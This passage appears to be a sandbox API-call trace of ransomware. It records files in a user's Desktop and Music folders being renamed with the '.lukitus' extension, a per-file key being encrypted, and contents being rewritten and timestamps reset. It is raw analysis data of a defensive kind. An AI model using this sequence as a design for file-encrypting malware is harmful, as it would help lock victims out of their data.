pbBuffer=0x281f594) returned 1 [0109.485] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.485] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.485] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.485] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.485] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.485] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.485] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0109.485] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0109.485] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Desktop\\zZG5e5YF\\HmCN--W\\2ZAx.swf" (normalized: "c:\\users\\aetadzjz\\desktop\\zzg5e5yf\\hmcn--w\\2zax.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0109.485] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Desktop\\zZG5e5YF\\HmCN--W\\2ZAx.swf" (normalized: "c:\\users\\aetadzjz\\desktop\\zzg5e5yf\\hmcn--w\\2zax.swf"), lpNewFileName="c:\\Users\\aETAdzjz\\Desktop\\zZG5e5YF\\HmCN--W\\F56924BE-9663-41BB-9F971724-7F39278F3E87.lukitus" (normalized: "c:\\users\\aetadzjz\\desktop\\zzg5e5yf\\hmcn--w\\f56924be-9663-41bb-9f971724-7f39278f3e87.lukitus"), dwFlags=0x9) returned 1 [0109.487] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0109.487] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0109.492] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x62ef, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x62ef, lpOverlapped=0x0) returned 1 [0109.493] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0109.493] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x62ef, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x62ef, lpOverlapped=0x0) returned 1 [0109.493] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0109.493] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x654a8470, dwHighDateTime=0x1d31760)) [0109.493] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0109.494] FlushFileBuffers (hFile=0x328) returned 1 [0109.496] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Desktop\\zZG5e5YF\\HmCN--W\\X1J-XzbtNP4bcL.mp3" (normalized: "c:\\users\\aetadzjz\\desktop\\zzg5e5yf\\hmcn--w\\x1j-xzbtnp4bcl.mp3"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x565f3a00, ftCreationTime.dwHighDateTime=0x1d30545, ftLastAccessTime.dwLowDateTime=0x67139d80, ftLastAccessTime.dwHighDateTime=0x1d2f895, ftLastWriteTime.dwLowDateTime=0x67139d80, ftLastWriteTime.dwHighDateTime=0x1d2f895, nFileSizeHigh=0x0, nFileSizeLow=0x1722)) returned 1 [0109.497] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.497] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.497] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.497] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.497] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.497] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.497] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.497] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.497] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.497] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.497] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.497] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.497] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.497] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.497] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.497] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.497] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.497] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.497] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.497] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.497] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0109.497] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0109.497] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Desktop\\zZG5e5YF\\HmCN--W\\X1J-XzbtNP4bcL.mp3" (normalized: "c:\\users\\aetadzjz\\desktop\\zzg5e5yf\\hmcn--w\\x1j-xzbtnp4bcl.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0109.497] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Desktop\\zZG5e5YF\\HmCN--W\\X1J-XzbtNP4bcL.mp3" (normalized: "c:\\users\\aetadzjz\\desktop\\zzg5e5yf\\hmcn--w\\x1j-xzbtnp4bcl.mp3"), lpNewFileName="c:\\Users\\aETAdzjz\\Desktop\\zZG5e5YF\\HmCN--W\\F56924BE-9663-41BB-5C2AB183-DBFCA67372B1.lukitus" (normalized: "c:\\users\\aetadzjz\\desktop\\zzg5e5yf\\hmcn--w\\f56924be-9663-41bb-5c2ab183-dbfca67372b1.lukitus"), dwFlags=0x9) returned 1 [0109.498] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0109.498] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0109.503] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x1722, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x1722, lpOverlapped=0x0) returned 1 [0109.504] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0109.504] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x1722, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x1722, lpOverlapped=0x0) returned 1 [0109.504] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0109.504] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x654a8470, dwHighDateTime=0x1d31760)) [0109.504] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0109.504] FlushFileBuffers (hFile=0x328) returned 1 [0109.507] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Music\\0j6ddd daqyN2jsKY.wav" (normalized: "c:\\users\\aetadzjz\\music\\0j6ddd daqyn2jsky.wav"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41895230, ftCreationTime.dwHighDateTime=0x1d2fa4d, ftLastAccessTime.dwLowDateTime=0x3504cec0, ftLastAccessTime.dwHighDateTime=0x1d30526, ftLastWriteTime.dwLowDateTime=0x3504cec0, ftLastWriteTime.dwHighDateTime=0x1d30526, nFileSizeHigh=0x0, nFileSizeLow=0xa1b6)) returned 1 [0109.507] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.507] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.507] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.508] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.508] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.508] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.508] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.508] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.508] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.508] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.508] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.508] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.508] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.508] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.508] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.508] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.508] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.508] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.508] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.508] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.508] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0109.508] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0109.508] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Music\\0j6ddd daqyN2jsKY.wav" (normalized: "c:\\users\\aetadzjz\\music\\0j6ddd daqyn2jsky.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0109.508] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Music\\0j6ddd daqyN2jsKY.wav" (normalized: "c:\\users\\aetadzjz\\music\\0j6ddd daqyn2jsky.wav"), lpNewFileName="c:\\Users\\aETAdzjz\\Music\\F56924BE-9663-41BB-370A4C85-1F80AE0D9C7A.lukitus" (normalized: "c:\\users\\aetadzjz\\music\\f56924be-9663-41bb-370a4c85-1f80ae0d9c7a.lukitus"), dwFlags=0x9) returned 1 [0109.510] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0109.510] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0109.514] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0xa1b6, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0xa1b6, lpOverlapped=0x0) returned 1 [0109.515] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0109.515] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0xa1b6, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0xa1b6, lpOverlapped=0x0) returned 1 [0109.515] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0109.516] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x654ce5d0, dwHighDateTime=0x1d31760)) [0109.516] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0109.516] FlushFileBuffers (hFile=0x328) returned 1 [0109.518] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Music\\AETaDb8fj.m4a" (normalized: "c:\\users\\aetadzjz\\music\\aetadb8fj.m4a"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x256dd9a0, ftCreationTime.dwHighDateTime=0x1d2f9a2, ftLastAccessTime.dwLowDateTime=0x1e664210, ftLastAccessTime.dwHighDateTime=0x1d305f9, ftLastWriteTime.dwLowDateTime=0x1e664210, ftLastWriteTime.dwHighDateTime=0x1d305f9, nFileSizeHigh=0x0, nFileSizeLow=0x11c24)) returned 1 [0109.518] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.519] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.519] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.519] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.519] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.519] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.519] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.519] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.519] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.519] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.519] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.519] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.519] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.519] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.519] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.519] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.519] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.519] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.519] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.519] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.519] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0109.519] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0109.519] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Music\\AETaDb8fj.m4a" (normalized: "c:\\users\\aetadzjz\\music\\aetadb8fj.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0109.519] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Music\\AETaDb8fj.m4a" (normalized: "c:\\users\\aetadzjz\\music\\aetadb8fj.m4a"), lpNewFileName="c:\\Users\\aETAdzjz\\Music\\F56924BE-9663-41BB-B3B4D02E-9E627B39C235.lukitus" (normalized: "c:\\users\\aetadzjz\\music\\f56924be-9663-41bb-b3b4d02e-9e627b39c235.lukitus"), dwFlags=0x9) returned 1 [0109.520] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0109.520] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0109.526] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x11c24, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x11c24, lpOverlapped=0x0) returned 1 [0109.527] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0109.527] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x11c24, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x11c24, lpOverlapped=0x0) returned 1 [0109.527] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0109.527] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x654f4730, dwHighDateTime=0x1d31760)) [0109.527] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0109.528] FlushFileBuffers (hFile=0x328) returned 1 [0109.531] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Music\\agMKSA0gka9nzokIE.m4a" (normalized: "c:\\users\\aetadzjz\\music\\agmksa0gka9nzokie.m4a"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8ac85c0, ftCreationTime.dwHighDateTime=0x1d3042f, ftLastAccessTime.dwLowDateTime=0x869b6b70, ftLastAccessTime.dwHighDateTime=0x1d2fd71, ftLastWriteTime.dwLowDateTime=0x869b6b70, ftLastWriteTime.dwHighDateTime=0x1d2fd71, nFileSizeHigh=0x0, nFileSizeLow=0xa8e5)) returned 1 [0109.531] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.531] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.531] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.531] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.531] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.531] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.531] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.531] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.531] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.531] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.531] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.531] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.531] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.531] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.531] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.531] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.531] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.531] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.531] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.531] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.531] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0109.531] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0109.531] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Music\\agMKSA0gka9nzokIE.m4a" (normalized: "c:\\users\\aetadzjz\\music\\agmksa0gka9nzokie.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0109.531] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Music\\agMKSA0gka9nzokIE.m4a" (normalized: "c:\\users\\aetadzjz\\music\\agmksa0gka9nzokie.m4a"), lpNewFileName="c:\\Users\\aETAdzjz\\Music\\F56924BE-9663-41BB-1BB670A3-7CA494BB8764.lukitus" (normalized: "c:\\users\\aetadzjz\\music\\f56924be-9663-41bb-1bb670a3-7ca494bb8764.lukitus"), dwFlags=0x9) returned 1 [0109.533] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0109.533] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, 